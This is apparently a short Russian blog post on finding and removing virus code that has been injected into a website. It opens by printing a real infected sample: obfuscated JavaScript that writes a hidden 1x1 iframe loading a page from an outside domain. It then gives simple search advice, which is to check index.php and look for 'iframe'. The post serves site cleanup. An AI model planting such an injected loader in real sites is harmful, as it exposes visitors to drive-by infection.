Как найти вирус на сайте

Вирусный код с сайта: найти и удалить

<script language=JavaScript>
jhtm=’%3Ciframe%20src%3D%22http%3A//inanalitics.in/inc/top/iframe.php%22
%20width%3D1%20height%3D1%20style%3D%22visibility%3A%20hidden%22%3E%3C
/iframe%3E’;crypo=unescape(jhtm);document.write(crypo);
</script>

Не так давно меня попросили разобраться с одним сайтом. Яндекс пометил его как распростаняющий вирусы, о чем выдавал информацию сразу после ссылки на сайт, да и антивирусы, способные фильтровать интернет-трафик, также ругаются на такие сайты.

Действительно, вирусы, написанные для сайтов, набирают популярность. Но надо понимать, что большинстве случаев, сам вирус находится на компьютере, имеющем ftp доступ к сайту. Принцип действия примерно следующий — вирус незаметно для пользователя крадёт пароли от ftp, подключается и вставляет в скрипты сайта паразитный код.

Для начала необходимо вылечить заражённый компьютер. Только после этого можно подключаться к удаленному серверу по FTP или SSH и начинать поиски файлов, заражённых вирусом. Для небольших проектов можно скачать весь сайт на локальный компьютер и осуществить поиск получится быстрее. Хотя это далеко не лучший вариант (особенно повезет владельцам сайтов на битриксе, в виду ОГРОМНОГО количества файлов этой кривой системы).

Что искать? Где искать? Это наверное два главных вопроса.

На первый вопрос отвечаю, что искать следует подозрительные строки в тексте, где встречается слово iframe, причем поиск начинать прежде всего с файлов index.html, index.php. Далее по всем .php и .html файлам.

Ну а найденное мной конкретно в описанном случае, вы увидели в самом начале этой статьи. Данный код находился в самом начале файла index.php в корневой директории сайта.

Не помогла статья компания СтопВирус готова вам помочь в борьбе с вирусами на сайте.